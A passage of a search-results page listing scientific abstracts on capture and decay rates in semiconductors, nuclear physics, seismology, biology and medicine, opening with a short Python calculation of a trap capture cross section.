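n = 1.0e15 * 1e6          # injected carrier density: 1e15 cm^-3 converted to m^-3
tau_capture = 2.0e-6      # measured capture time constant, s (hypothetical)

v_th = math.sqrt(3.0 * k_B * T / m_eff)        # thermal velocity, m/s
sigma = 1.0 / (tau_capture * v_th * n)         # capture cross section, m^2

print(f"v_th ~ {v_th:.2e} m/s, sigma ~ {sigma*1e4:.2e} cm^2")
```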
This method, a variation of deep level transient spectroscopy (DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V{sub 2}) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 19. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors SciTech Connect Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-02 In this study, an improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. This method, a variation of deep level transient spectroscopy(DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V2) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 20. α-decay branching ratios of near-threshold states in 19Ne and the astrophysical rate of 15O(α,γ)19Ne Davids, B.; van den Berg, A. M.; Dendooven, P.; Fleurot, F.; Hunyadi, M.; de Huu, M. A.; Rehm, K. E.; Segel, R. E.; Siemssen, R. H.; Wilschut, H. W.; Wörtche, H. J.; Wuosmaa, A. H. 2003-01-01 The 15O(α,γ)19Ne reaction is one of two routes for breakout from the hot CNO cycles into the rp process in accreting neutron stars. Its astrophysical rate depends critically on the decay properties of excited states in 19Ne lying just above the 15O+α threshold. We have measured the α-decay branching ratios for these states using the p(21Ne,t)19Ne reaction at 43 MeV/nucleon. Combining our measurements with previous determinations of the radiative widths of these states, we conclude that no significant breakout from the hot CNO cycle into the rp process in novas is possible via 15O(α,γ)19Ne, assuming that current models accurately represent their temperature and density conditions. 1. DETERMINING THE RATIO OF THE H+ YIELDS TV TO H+ YIELDS TB DECAY RATES FOR LARGE TAN BETA AT THE LARGE HADRON COLLIDER. SciTech Connect ASSAMAGAN,K.A.GUASCH,J.MORETTI,S.PENARANDA,S. 2003-05-27 We present results on the determination of the observable ratio R = BR(H{sup +} {yields} {tau}{sup +}{nu}{sup -})/BR(H{sup +} {yields} t{bar b}) of charged Higgs boson decay rates as a discriminant quantity between Supersymmetric and non-Supersymmetric models. 
Simulation of measurements of this quantity through the analysis of the charged Higgs production process gb {yields} tbH{sup +} and relative backgrounds in the two above decay channels has been performed in the context of ATLAS. A {approx} 12-14% accuracy on R can be achieved for tan {beta} = 50, m{sub H{sup {+-}}} = 300-500 GeV and after an integrated luminosity of 300 fb{sup -1}. With this precision measurement, the Large Hadron Collider (LHC) can easily discriminate between models for the two above scenarios, so long as tan {beta} > 20. 2. Regional stressing rate appears to control duration and decay of off-fault aftershocks in the 2011 M=9.0 Tohoku-oki, Japan, earthquake Toda, S.; Stein, R. S. 2013-12-01 The 11 March 2001 M=9.0 Tohoku-oki, Japan, earthquake brought the unprecedented broad increase in seismicity over inland Japan and far offshore. The seismicity rate increase was observed at distances of up to 425 km from the locus of high seismic slip on the megathrust, which roughly corresponds to the areas over 0.1 bar Coulomb stress increase (e.g., Toda et al., 2011). Such stress perturbation in the entire eastern Honshu island gives us a great opportunity to test one of the hypotheses in rate and state friction of Dieterich (1994): aftershock duration (ta) is inversely proportional to fault stressing rate. The Tohoku-oki mainshock indeed started a stopwatch simultaneously for all the off-fault and on-fault aftershocks in various tectonic situations. We have carefully examined the aftershock decays fitting the Omori-Utsu formula in several activated regions, including on the 2011 source fault, several inland areas of Tohoku (Akita, Iwaki, northern Sendai, and Fukushima), Tokyo metropolitan area, Choshi (east of Tokyo), Izu Peninsula, and areas along the most active Itoigawa-Shizuoka Tectonic Line (ISTL) central Honshu. Comparing the regional aftershock decays with the background rates of seismicity estimated from the JMA catalog from 2000 to 2010, we measured ta. One of the extreme short duration was measured at the Izu Peninsula where the heightened seismicity was rapidly toned down to the normal in one month. Overall seismicity in the Tohoku mainshock zone has been mostly closing to normal in 2 - 3 years. Both regions are characterized by high loading rate due to plate collision and subduction. Seismicity beneath Tokyo, also characterized by complex plate interfaces and brought average 1 bar closer to failure, has not followed the simple Omori decay but being settled a new higher rate after a rapid decay. In contrast to these highly deformed regions, current seismicity in slowly loading Tohoku inland regions are still much higher than background rate, which 3. [Estimation on the level of birth and death rates of population in the three gorges area by means of capture-mark-recapture method]. PubMed Zhang, Jing; Mao, De-qiang; He, Yuan-yuan; Yan, Chao-yang; Jiang, Bin; Ning, Gui-jun; Huang, Yu-ying; Wang, Xin-li; Luo, Chao; Shi, Guo-sheng; Chen, Bin; Yang, Wei-zhong 2006-11-01 To evaluate quality of surveillance and emendate rates of birth and death of population of the Three Gorges area. Data on the two samples collected were designed based on principle of capture-recapture method. An investigation of missing report of birth and death was conducted in 7061 families selected through stratified random sampling method. 
We collected and registered the data of birth and death in every family investigated and checked with correlative records reported in disease surveillance system of the Three Gorges area. The missing report rates and the 95% confidence intervals of birth rate and death rate were calculated. The underreporting rates of birth and death were 13.91% and 15.60% and death of infant was 33.33%. The emended birth rate was 8.92 per thousandth and the 95% confidence interval of birth rate was 8.38 per thousandth-9.45 per thousandth. The emended report rate of death was 6.88 per thousandth and the collectivity 95% confidence interval was 6.37%-7.38 per thousandth. Results showed that the quality of birth and death in the disease surveillance reporting system of Three Gorges area was competent to the quality level of the standard set for national disease surveillance system. The birth and death rates of population in the Three Gorges area were under 10.00 per thousandth. 4. Radiative capture versus Coulomb dissociation. SciTech Connect Esbensen, H.; Physics 2006-01-01 Measurements of the Coulomb dissociation of {sup 8}B have been used to infer the rate of the inverse radiative proton capture on {sup 7}Be. The analysis is usually based on the assumptions that the two processes are related by detailed balance and described by E1 transitions. However, there are corrections to this relation. The Coulomb form factors for the two processes, for example, are not identical. There are also E2 transitions and higher-order effects in the Coulomb dissociation, and the nuclear induced breakup cannot always be ignored. While adding first-order E2 transitions enhances the decay energy spectrum, the other mechanisms cause a suppression at low relative energies. The net result may accidentally be close to the conventional first-order E1 calculation, but there are differences which cannot be ignored if accuracies of 10% or better are needed. 5. Is decay constant? PubMed Pommé, S; Stroh, H; Altzitzoglou, T; Paepen, J; Van Ammel, R; Kossert, K; Nähle, O; Keightley, J D; Ferreira, K M; Verheyen, L; Bruggeman, M 2017-09-07 6. An all-aqueous route to polymer brush-modified membranes with remarkable permeabilites and protein capture rates PubMed Central Anuraj, Nishotha; Bhattacharjee, Somnath; Geiger, James H.; Baker, Gregory L.; Bruening, Merlin L. 2011-01-01 Microporous membranes are attractive for protein purification because convection rapidly brings proteins to binding sites. However, the low binding capacity of such membranes limits their applications. This work reports a rapid, aqueous procedure to create highly permeable, polymer brush-modified membranes that bind large amounts of protein. The synthetic method includes a 10-min adsorption of a macroinitiator in a hydroxylated nylon membrane and a subsequent 5-min aqueous atom transfer radical polymerization of 2-(methacryloyloxy)ethyl succinate from the immobilized initiator to form poly(acid) brushes. This procedure likely leads to more swollen, less dense brushes than polymerization from silane initiators, and thus requires less polymer to achieve the same binding capacity. The hydraulic permeability of the poly(acid) membranes is 4-fold higher than that of similar membranes prepared by growing brushes from immobilized silane initiators. 
These brush-containing nylon membranes bind 120 mg/cm3 of lysozyme using solution residence times as short as 35 ms, and when functionalized with nitrilotriacetate (NTA)-Ni2+ complexes, they capture 85 mg/cm3 of histidine6-tagged (His-tagged) Ubiquitin. Additionally the NTA-Ni2+-functionalized membranes isolate His-tagged myo-inositol-1-phosphate synthase directly from cell extracts and show >90% recovery of His-tagged proteins. PMID:22287817 7. Effect of release rate and ratio of (Z)-11-hexadecen-1-ol from synthetic pheromone blends on trap capture ofHeliothis subflexa (Lepidoptera: Noctuidae). PubMed Heath, R R; Mitchell, E R; Cibrian Tovar, J 1990-04-01 8. Symmetry relations in nucleon decay Hurlbert, Anya; Wilczek, Frank 1980-05-01 Some experimental consequences of the structure of the effective hamiltonian for nucleon decay are presented. New results concern relations among inclusive decay rates, a striking test of the kinship hypothesis involving μ+ polarization, and soft π theorems. 9. Do numerical rating scales and the Roland-Morris Disability Questionnaire capture changes that are meaningful to patients with persistent back pain? PubMed Hush, Julia M; Refshauge, Kathryn M; Sullivan, Gerard; De Souza, Lorraine; McAuley, James H 2010-07-01 To investigate patients' views about two common outcome measures used for back pain: Numerical Rating Scales for pain and the Roland-Morris Disability Questionnaire. Thirty-six working adults who had previously sought primary care for back pain and who could speak and read English. Eight focus groups were conducted to explore participants' views about the 11-point Numerical Rating Scales and the 24-item Roland-Morris Disability Questionnaire. Each group was led by a facilitator and an interview topic guide was used. Audio recordings of focus groups were transcribed verbatim. Framework analysis was used to chart participants' views and an interpretive analysis performed to explain the findings. Participants reported that neither the Roland-Morris nor the Numerical Rating Scales captured the complex personal experience of pain or relevant changes in their condition. The time-frame of assessment was identified as particularly problematic and the Roland-Morris did not capture relevant functional domains. This study provides empirical data that working adults with persistent back pain consider these clinical outcome measures largely inadequate. These measures currently used for back pain may contribute to misleading conclusions about treatment efficacy and patient recovery. 10. Capsule endoscopy capture rate: Has 4 frames-per-second any impact over 2 frames-per-second? PubMed Central Fernandez-Urien, Ignacio; Carretero, Cristina; Borobio, Erika; Borda, Ana; Estevez, Emilio; Galter, Sara; Gonzalez-Suarez, Begoña; Gonzalez, Benito; Lujan, Marisol; Martinez, Jose Luis; Martínez, Vanessa; Menchén, Pedro; Navajas, Javier; Pons, Vicente; Prieto, Cesar; Valle, Julio 2014-01-01 AIM: To compare the current capsule and a new prototype at 2 and 4 frames-per-second, respectively, in terms of clinical and therapeutic impact. METHODS: One hundred patients with an indication for capsule endoscopy were included in the study. All procedures were performed with the new device (SB24). After an exhaustive evaluation of the SB24 videos, they were then converted to “SB2-like” videos for their evaluation. Findings, frames per finding, and clinical and therapeutic impact derived from video visualization were analyzed. 
Kappa index for interobserver agreement and χ² and Student's t tests for qualitative/quantitative variables, respectively, were used. Values of P under 0.05 were considered statistically significant. RESULTS: Eighty-nine out of 100 cases included in the study were ultimately included in the analysis. The SB24 videos detected the anatomical landmarks (Z-line and duodenal papilla) and lesions in more patients than the "SB2-like" videos. On the other hand, the SB24 videos detected more frames per landmark/lesion than the "SB2-like" videos. However, these differences were not statistically significant (P > 0.05). Both clinical and therapeutic impacts were similar between SB24 and "SB2-like" videos (K = 0.954). The time spent by readers was significantly higher for SB24 video visualization (P < 0.05) than for "SB2-like" videos when all images captured by the capsule were considered. However, these differences become non-significant if we only take into account small bowel images (P > 0.05). CONCLUSION: More frames-per-second detect more landmarks, lesions, and frames per landmark/lesion, but this is time consuming and has a very low impact on clinical and therapeutic management. PMID:25339834 11. Bivariate distributions in statistical spectroscopy studies: IV. Interacting particle Gamow-Teller strength densities and β-decay rates of fp-shell nuclei for presupernova stars Kota, V. K. B.; Majumdar, D. 1995-12-01 A method to calculate temperature-dependent β-decay rates is developed by writing the expression for the rates explicitly in terms of bivariate GT strength densities I_H^O(GT) for a given hamiltonian H = h + V and state densities of the parent nucleus, besides having the usual phase space factors. The theory developed in the preceding paper (III) for constructing NIP strength densities is applied for generating I_h^O(GT), and then I_H^O(GT) is constructed using the bivariate convolution form I_H^O(GT) = Σ_S I_{h,S}^O(GT) ⊗ ρ_{V,S; BIV-G}^O(GT). The spreading bivariate Gaussian ρ_{V; BIV-G}^O(GT), for fp-shell nuclei, is constructed by assuming that the marginal centroids are zero and the marginal variances are the same as the corresponding state density variances, and by fixing the bivariate correlation coefficient ζ̄ using experimental β-decay half-lives. With the deduced values of ζ̄ (ζ̄ ≈ 0.67), β⁻-decay rates for ⁶¹,⁶²Fe and ⁶²⁻⁶⁴Co isotopes are calculated at presupernova matter densities ρ = 10⁷-10⁹ gm/cc, temperatures T = (3-5)×10⁹ °K and electron fractions Ye = 0.43-0.5. The convolution form for I_H^O(GT) led to a simple expression for calculating the GT non-energy-weighted sum rule strength, and it describes (within 10%) the shell model results of fp-shell nuclei. 12. A method to characterize in vivo tendon force-strain relationship by combining ultrasonography, motion capture and loading rates. PubMed Gerus, Pauline; Rao, Guillaume; Berton, Eric 2011-08-11 Ultrasonography makes it possible to investigate the in vivo tendon force-strain relationship during isometric contraction. In previous studies, different methods are available to estimate the tendon strain, using different loading rates and models to fit the tendon force-strain relationship. This study aimed to propose a standard method to characterize the in vivo tendon force-strain relationship.
We investigated the influence on the force-strain relationship for medialis gastrocnemius (MG) of (1) one method which takes into account probe and joint movements to estimate the instantaneous tendon length, (2) models used to fit the force-strain relationship for uniaxial test (polynomial vs. Ogden), and (3) the loading rate on tendon strain. Subjects performed ramp-up contraction during isometric contractions at two different target speeds: 1.5s and minimal time with ultrasound probe fixed over the muscle-tendon junction of the MG muscle. The used method requires three markers on ultrasound probe and a marker on calcaneum to take into account all movements, and was compared to the strain estimated using ultrasound images only. The method using ultrasound image only overestimated the tendon strain from 40% of maximal force. The polynomial model showed similar fitting results than the Ogden model (R²=0.98). A loading rate effect was found on tendon strain, showing a higher strain when loading rate decreases. The characterization of tendon force-strain relationship needs to be standardized by taking into account all movements to estimate tendon strain and controlling the loading rate. The polynomial model appears to be appropriate to represent the tendon force-strain relationship. 13. Carcass enrichment does not alter decay rates or arthropod community structure: a test of the arthropod saturation hypothesis at the anthropology research facility in Knoxville, Tennessee. PubMed Shahid, S Adam; Schoenly, Kenneth; Haskell, Neal H; Hall, Robert D; Zhang, Wenjun 2003-07-01 In a test of an arthropod saturation hypothesis, we asked if the 30-yr history of carcass enrichment at the Anthropology Research Facility, Knoxville TN, has altered carcass decay rates or community structure of sarcosaprophagous arthropods, compared with three local nonenriched sites. Over a 12-d period in 1998, using pitfall traps and sweep nets, we sampled a total of 81,000 invertebrates from freshly euthanized pigs (Sus scrofa L.) placed in these sites. From this number, we sorted 69,286 forensically important (sarcosaprophagous) arthropods. The community structure of these organisms, as measured by species and individuals accumulation curves, rarefaction, and nonparametric correlation, was comparable in all four sites in taxonomic similarity, colonization rates, aerial species richness, and ranked abundances of forensically important taxa on a per carcass basis. Measures of carcass decay rate, remaining carcass weight (%) and periodic weight loss, also were similar. In most cases, carcass surface temperatures and maggot mass temperatures were also statistically indistinguishable. Probability-based results and posthoc power analyses of these variables led us to conclude that the sarcosaprophagous arthropod community of the Anthropology Research Facility is representative of surrounding sites. 14. Theory of nuclear excitation by electron capture for heavy ions Pálffy, Adriana; Scheid, Werner; Harman, Zoltán 2006-01-01 We investigate the resonant process of nuclear excitation by electron capture (NEEC), in which a continuum electron is captured into a bound state of an ion with the simultaneous excitation of the nucleus. In order to derive the cross section a Feshbach projection operator formalism is introduced. Nuclear states and transitions are described by a nuclear collective model and making use of experimental data. 
Transition rates and total cross sections for NEEC followed by the radiative decay of the excited nucleus are calculated for various heavy-ion collision systems. 15. Comparative study of Gamow-Teller strength distributions in the odd-odd nucleus {sup 50}V and its impact on electron capture rates in astrophysical environments SciTech Connect 2007-11-15 Gamow-Teller (GT) strength transitions are an ideal probe for testing nuclear structure models. In addition to nuclear structure, GT transitions in nuclei directly affect the early phases of Type Ia and Type-II supernovae core collapse since the electron capture rates are partly determined by these GT transitions. In astrophysics, GT transitions provide an important input for model calculations and element formation during the explosive phase of a massive star at the end of its life-time. Recent nucleosynthesis calculations show that odd-odd and odd-A nuclei cause the largest contribution in the rate of change of lepton-to-baryon ratio. In the present manuscript, we have calculated the GT strength distributions and electron capture rates for odd-odd nucleus {sup 50}V by using the pn-QRPA theory. At present {sup 50}V is the first experimentally available odd-odd nucleus in fp-shell nuclei. We also compare our GT strength distribution with the recently measured results of a {sup 50}V(d, {sup 2}He){sup 50}Ti experiment, with the earlier work of Fuller, Fowler, and Newman (referred to as FFN) and subsequently with the large-scale shell model calculations. One curious finding of the paper is that the Brink's hypothesis, usually employed in large-scale shell model calculations, is not a good approximation to use at least in the case of {sup 50}V. SNe Ia model calculations performed using FFN rates result in overproduction of {sup 50}Ti, and were brought to a much acceptable value by employing shell model results. It might be interesting to study how the composition of the ejecta using presently reported QRPA rates compare with the observed abundances. 16. Comparative study of Gamow-Teller strength distributions in the odd-odd nucleus V50 and its impact on electron capture rates in astrophysical environments 2007-11-01 Gamow-Teller (GT) strength transitions are an ideal probe for testing nuclear structure models. In addition to nuclear structure, GT transitions in nuclei directly affect the early phases of Type Ia and Type-II supernovae core collapse since the electron capture rates are partly determined by these GT transitions. In astrophysics, GT transitions provide an important input for model calculations and element formation during the explosive phase of a massive star at the end of its life-time. Recent nucleosynthesis calculations show that odd-odd and odd-A nuclei cause the largest contribution in the rate of change of lepton-to-baryon ratio. In the present manuscript, we have calculated the GT strength distributions and electron capture rates for odd-odd nucleus V50 by using the pn-QRPA theory. At present V50 is the first experimentally available odd-odd nucleus in fp-shell nuclei. We also compare our GT strength distribution with the recently measured results of a V50(d, He2)Ti50 experiment, with the earlier work of Fuller, Fowler, and Newman (referred to as FFN) and subsequently with the large-scale shell model calculations. One curious finding of the paper is that the Brink's hypothesis, usually employed in large-scale shell model calculations, is not a good approximation to use at least in the case of V50. 
SNe Ia model calculations performed using FFN rates result in overproduction of Ti50, and were brought to a much acceptable value by employing shell model results. It might be interesting to study how the composition of the ejecta using presently reported QRPA rates compare with the observed abundances. 17. Measurement of branching fractions and rate asymmetries in the rare decays B→K(*)l⁺l⁻ SciTech Connect Lees, J. P.; Poireau, V.; Tisserand, V.; Garra Tico, J.; Grauges, E.; Palano, A.; Eigen, G.; Stugu, B.; Brown, D. N.; Kerth, L. T.; Kolomensky, Yu. G.; Lynch, G.; Koch, H.; Schroeder, T.; Asgeirsson, D. J.; Hearty, C.; Mattison, T. S.; McKenna, J. A.; Khan, A.; Blinov, V. E.; Buzykaev, A. R.; Druzhinin, V. P.; Golubev, V. B.; Kravchenko, E. A.; Onuchin, A. P.; Serednyakov, S. I.; Skovpen, Yu. I.; Solodov, E. P.; Todyshev, K. Yu.; Yushkov, A. N.; Bondioli, M.; Kirkby, D.; Lankford, A. J.; Mandelkern, M.; Atmacan, H.; Gary, J. W.; Liu, F.; Long, O.; Vitug, G. M.; Campagnari, C.; Hong, T. M.; Kovalskyi, D.; Richman, J. D.; West, C. A.; Eisner, A. M.; Kroseberg, J.; Lockman, W. S.; Martinez, A. J.; Schumm, B. A.; Seiden, A.; Chao, D. S.; Cheng, C. H.; Echenard, B.; Flood, K. T.; Hitlin, D. G.; Ongmongkolkul, P.; Porter, F. C.; Rakitin, A. Y.; Andreassen, R.; Huard, Z.; Meadows, B. T.; Sokoloff, M. D.; Sun, L.; Bloom, P. C.; Ford, W. T.; Gaz, A.; Nauenberg, U.; Smith, J. G.; Wagner, S. R.; Ayad, R.; Toki, W. H.; Spaan, B.; Schubert, K. R.; Schwierz, R.; Bernard, D.; Verderi, M.; Clark, P. J.; Playfer, S.; Bettoni, D.; Bozzi, C.; Calabrese, R.; Cibinetto, G.; Fioravanti, E.; Garzia, I.; Luppi, E.; Munerato, M.; Negrini, M.; Piemontese, L.; Santoro, V.; Baldini-Ferroli, R.; Calcaterra, A.; de Sangro, R.; Finocchiaro, G.; Patteri, P.; Peruzzi, I. M.; Piccolo, M.; Rama, M.; Zallo, A.; Contri, R.; Guido, E.; Lo Vetere, M.; Monge, M. R.; Passaggio, S.; Patrignani, C.; Robutti, E.; Bhuyan, B.; Prasad, V.; Lee, C. L.; Morii, M.; Edwards, A. J.; Adametz, A.; Uwer, U.; Lacker, H. M.; Lueck, T.; Dauncey, P. D.; Behera, P. K.; Mallik, U.; Chen, C.; Cochran, J.; Meyer, W. T.; Prell, S.; Rubin, A. E.; Gritsan, A. V.; Guo, Z. J.; Arnaud, N.; Davier, M.; Derkach, D.; Grosdidier, G.; Le Diberder, F.; Lutz, A. M.; Malaescu, B.; Roudeau, P.; Schune, M. H.; Stocchi, A.; Wormser, G.; Lange, D. J.; Wright, D. M.; Chavez, C. A.; Coleman, J. P.; Fry, J. R.; Gabathuler, E.; Hutchcroft, D. E.; Payne, D. J.; Touramanis, C.; Bevan, A. J.; Di Lodovico, F.; Sacco, R.; Sigamani, M.; Cowan, G.; Brown, D. N.; Davis, C. L.; Denig, A. G.; Fritsch, M.; Gradl, W.; Griessinger, K.; Hafner, A.; Prencipe, E.; Barlow, R. J.; Jackson, G.; Lafferty, G. D.; Behn, E.; Cenci, R.; Hamilton, B.; Jawahery, A.; Roberts, D. A.; Dallapiccola, C.; Cowan, R.; Dujmic, D.; Sciolla, G.; Cheaib, R.; Lindemann, D.; Patel, P. M.; Robertson, S. H.; Biassoni, P.; Neri, N.; Palombo, F.; Stracka, S.; Cremaldi, L.; Godang, R.; Kroeger, R.; Sonnek, P.; Summers, D. J.; Nguyen, X.; Simard, M.; Taras, P.; De Nardo, G.; Monorchio, D.; Onorato, G.; Sciacca, C.; Martinelli, M.; Raven, G.; Jessop, C. P.; LoSecco, J. M.; Wang, W. F.; Honscheid, K.; Kass, R.; Brau, J.; Frey, R.; Sinev, N. B.; Strom, D.; Torrence, E.; Feltresi, E.; Gagliardi, N.; Margoni, M.; Morandin, M.; Posocco, M.; Rotondo, M.; Simi, G.; Simonetto, F.; Stroili, R.; Akar, S.; Ben-Haim, E.; Bomben, M.; Bonneaud, G. 
R.; Briand, H.; Calderini, G.; Chauveau, J.; Hamon, O.; Leruste, Ph.; Marchiori, G.; Ocariz, J.; Sitt, S.; Biasini, M.; Manoni, E.; Pacetti, S.; Rossi, A.; Angelini, C.; Batignani, G.; Bettarini, S.; Carpinelli, M.; Casarosa, G.; Cervelli, A.; Forti, F.; Giorgi, M. A.; Lusiani, A.; Oberhof, B.; Paoloni, E.; Perez, A.; Rizzo, G.; Walsh, J. J.; Lopes Pegna, D.; Olsen, J.; Smith, A. J. S.; Telnov, A. V.; Anulli, F.; Faccini, R.; Ferrarotto, F.; Ferroni, F.; Gaspero, M.; Li Gioi, L.; Mazzoni, M. A.; Piredda, G.; Bünger, C.; Grünberg, O.; Hartmann, T.; Leddig, T.; Schröder, H.; Voss, C.; Waldi, R.; Adye, T.; Olaiya, E. O.; Wilson, F. F.; Emery, S.; Hamel de Monchenault, G.; Vasseur, G.; Yèche, Ch.; Aston, D.; Bard, D. J.; Bartoldus, R.; Benitez, J. F.; Cartaro, C.; Convery, M. R.; Dorfan, J.; Dubois-Felsmann, G. P.; Dunwoodie, W.; Ebert, M.; Field, R. C.; Franco Sevilla, M.; Fulsom, B. G.; Gabareen, A. M.; Graham, M. T.; Grenier, P.; Hast, C.; Innes, W. R.; Kelsey, M. H.; Kim, P.; Kocian, M. L.; Leith, D. W. G. S.; Lewis, P.; Lindquist, B.; Luitz, S.; Luth, V.; Lynch, H. L.; MacFarlane, D. B.; Muller, D. R.; Neal, H.; Nelson, S.; Perl, M.; Pulliam, T.; Ratcliff, B. N.; Roodman, A.; Salnikov, A. A.; Schindler, R. H.; Snyder, A.; Su, D.; Sullivan, M. K.; Va’vra, J.; Wagner, A. P.; Wisniewski, W. J.; Wittgen, M.; Wright, D. H.; Wulsin, H. W.; Young, C. C.; Ziegler, V.; Park, W.; Purohit, M. V.; White, R. M.; Wilson, J. R.; Randle-Conde, A.; Sekula, S. J.; Bellis, M.; Burchat, P. R.; Miyashita, T. S.; Alam, M. S.; Ernst, J. A.; Gorodeisky, R.; Guttman, N.; Peimer, D. R.; Soffer, A.; Lund, P.; Spanier, S. M.; Ritchie, J. L.; Ruland, A. M.; Schwitters, R. F.; Wray, B. C.; Izen, J. M.; Lou, X. C.; Bianchi, F.; Gamba, D.; Lanceri, L.; Vitale, L.; Martinez-Vidal, F.; Oyanguren, A.; Ahmed, H.; Albert, J.; Banerjee, Sw.; Bernlochner, F. U.; Choi, H. H. F.; King, G. J.; Kowalewski, R.; Lewczuk, M. J.; Nugent, I. M.; Roney, J. M.; Sobie, R. J.; Tasneem, N.; Gershon, T. J.; Harrison, P. F.; Latham, T. E.; Puccio, E. M. T.; Band, H. R.; Dasu, S.; Pan, Y.; Prepost, R.; Wu, S. L. 2012-08-24 In a sample of 471×10⁶ BB¯¯¯ events collected with the BABAR detector at the PEP-II e⁺e⁻ collider we study the rare decays B→K(*)l⁺l⁻, where l⁺l⁻ is either e⁺e⁻ or μ⁺μ⁻. We report results on partial branching fractions and isospin asymmetries in seven bins of dilepton mass-squared. We further present CP and lepton-flavor asymmetries for dilepton masses below and above the J/ψ resonance. We find no evidence for CP or lepton-flavor violation. The partial branching fractions and isospin asymmetries are consistent with the Standard Model predictions and with results from other experiments. 18. Enhancement of the lepton flavor violating Higgs boson decay rates from SUSY loops in the inverse seesaw model Arganda, E.; Herrero, M. J.; Marcano, X.; Weiland, C. 2016-03-01 In this article, we study the full one-loop SUSY contributions to the lepton flavor violating Higgs decay h →τ μ ¯, within the context of the supersymmetric inverse seesaw model. We assume that both the right-handed neutrino masses, MR, and their supersymmetric partner masses, mν˜R , are not far from the interesting O (TeV ) energy scale, and we work with scenarios with large neutrino Yukawa couplings that transmit large lepton flavor violating effects. 
By exploring the behavior with the most relevant parameters, mainly MR, mν̃R and the trilinear sneutrino coupling Aν, we will look for regions of the parameter space where the enhancement of BR(h → τμ̄) is large enough to reach values at the percent level, which could explain the excess recently reported by CMS and ATLAS at the CERN Large Hadron Collider. 19. EPA Pesticide Factsheets Radioactive decay is the emission of energy in the form of ionizing radiation. Example decay chains illustrate how radioactive atoms can go through many transformations as they become stable and no longer radioactive. 20. K dependence in the gamma decay of neutron resonances in ¹⁶⁸Er and ¹⁷⁸Hf SciTech Connect Rekstad, J.; Tveter, T.S.; Guttormsen, M.; Bergholt, L. 1993-06-01 The energy-corrected transition rates for γ decay of the n-capture states in ¹⁶⁸Er and ¹⁷⁸Hf are calculated from data available in the literature. If one assumes that the capture states have good K values, the data reveal a significantly lower average transition rate when the normal K-selection rules are broken than for K-allowed transitions. The effect is more profound in the data from thermal neutron capture than in the data from 2 keV neutron capture. 1. Precision evaluation of the ⁷¹Ga(νe,e⁻) solar neutrino capture rate from the (³He,t) charge-exchange reaction Frekers, D.; Adachi, T.; Akimune, H.; Alanssari, M.; Brown, B. A.; Cleveland, B. T.; Ejiri, H.; Fujita, H.; Fujita, Y.; Fujiwara, M.; Gavrin, V. N.; Harakeh, M. N.; Hatanaka, K.; Holl, M.; Iwamoto, C.; Lennarz, A.; Okamoto, A.; Okamura, H.; Suzuki, T.; Tamii, A. 2015-03-01 A precision measurement of the ⁷¹Ga(³He,t)⁷¹Ge charge-exchange reaction was performed. By using a rather complete set of theoretical form factors to describe the cross-section angular distributions over a large angular range, the Gamow-Teller strength distribution up to the effective neutron-separation energy in ⁷¹Ge was extracted. The data and the analysis constrain the ⁷¹Ga(νe,e⁻) solar neutrino rate in a neutrino nonoscillation scenario. For nonoscillating neutrinos we report a solar neutrino capture rate of 122.4 ± 3.4 (stat) ± 1.1 (sys) SNU, which is lower than the presently accepted value of 132 ± 18 SNU, though not in disagreement given the quoted errors. 2. Tooth Decay MedlinePlus You call it a cavity. Your dentist calls it tooth decay or dental caries. They're all names for a hole in your tooth. The cause of tooth decay is plaque, a sticky substance in your mouth made up mostly of germs. Tooth decay starts in the outer layer, called the enamel. Without ... 3. Trunk decays Treesearch Alex L. Shigo 1989-01-01 Trunk decays are major causes of low-quality wood: wood with little or no economic value. As a forest practitioner you should be able to recognize trees at high risk for decay and remove them if timber production is your primary objective. Remember, however, that decayed trees often develop into den trees or nesting sites and provide essential habitat for wildlife.... 4. mRNA decay rates in late-developing Dictyostelium discoideum cells are heterogeneous, and cyclic AMP does not act directly to stabilize cell-type-specific mRNAs. PubMed Central Manrow, R E; Jacobson, A 1988-01-01 We reevaluated the use of ³²PO₄ pulse-chases for analyzing mRNA decay rates in late-developing Dictyostelium cells.
We found that completely effective PO4 chases could not be obtained in developing cells and that, as a consequence, the decay rates exhibited by some mRNAs were influenced by the rates at which they were transcribed. In developing cells disaggregated in the presence of cyclic AMP, the poly(A)+ mRNA population turned over with an apparent half-life of 4 h, individual mRNA decay rates were heterogeneous, and some prestalk and prespore mRNAs appeared to decay with biphasic kinetics. In cells disaggregated in the absence of cyclic AMP, all prestalk and prespore mRNAs decayed with biphasic kinetics. During the first 1 to 1.5 h after disaggregation in the absence of cyclic AMP, the cell-type-specific mRNAs were selectively degraded, decaying with half-lives of 20 to 30 min; thereafter, the residual prestalk and prespore mRNA molecules decayed at rates that were similar to those measured in the presence of cyclic AMP. This short-term labilization of cell-type-specific mRNAs was observed even for those species not requiring cyclic AMP for their accumulation in developing cells. The observation that cell-type specific mRNAs can decay at similar rates in disaggregated cells with or without cyclic AMP indicates that this compound does not act directly to stabilize prestalk and prespore mRNAs during development and that its primary role in the maintenance of cyclic-AMP-dependent mRNAs is likely to be transcriptional. Images PMID:2847029 5. Investigation and modeling of biomass decay rate in the dark and its potential influence on net productivity of solar photobioreactors for microalga Chlamydomonas reinhardtii and cyanobacterium Arthrospira platensis. PubMed Le Borgne, François; Pruvost, Jérémy 2013-06-01 Biomass decay rate (BDR) in the dark was investigated for Chlamydomonas reinhardtii (microalga) and Arthrospira platensis (cyanobacterium). A specific setup based on a torus photobioreactor with online gas analysis was validated, enabling us to follow the time course of the specific BDR using oxygen monitoring and mass balance. Various operating parameters that could limit respiration rates, such as culture 